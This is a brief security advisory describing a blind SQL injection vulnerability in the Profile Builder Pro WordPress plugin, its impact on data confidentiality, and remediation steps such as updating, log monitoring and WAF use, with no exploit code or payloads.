A critical Blind SQL Injection vulnerability in Profile Builder Pro allows attackers to silently exfiltrate sensitive database information, including user credentials and configuration data.

The plugin fails to properly neutralize special elements used in SQL commands. This allows an attacker to perform "Blind" SQL injection, where they can infer database content based on the server's response time or HTTP status codes, even if direct error messages are suppressed.

With a CVSS score of 9.3, this vulnerability represents a major threat to data confidentiality. Attackers can extract user hashes, personal information, and site metadata, which can be used for further attacks or sold on the dark web. This could lead to significant regulatory fines and a loss of customer trust.

Immediate Action: Update Cozmoslabs Profile Builder Pro to the latest version (above 3.13.9) immediately to resolve the improper query handling.

Proactive Monitoring: Monitor database logs for unusual query patterns and look for time-delay based attacks in web server access logs (e.g., requests that take exactly 5 or 10 seconds to respond).

Compensating Controls: Use a Web Application Firewall (WAF) with SQL injection protection enabled to filter out malicious payloads targeting database parameters.

Public Exploit Available: false

Organizations must prioritize the application of the patch. The ability to extract the entire database through blind injection is a critical risk that must be mitigated immediately to protect sensitive user and corporate data.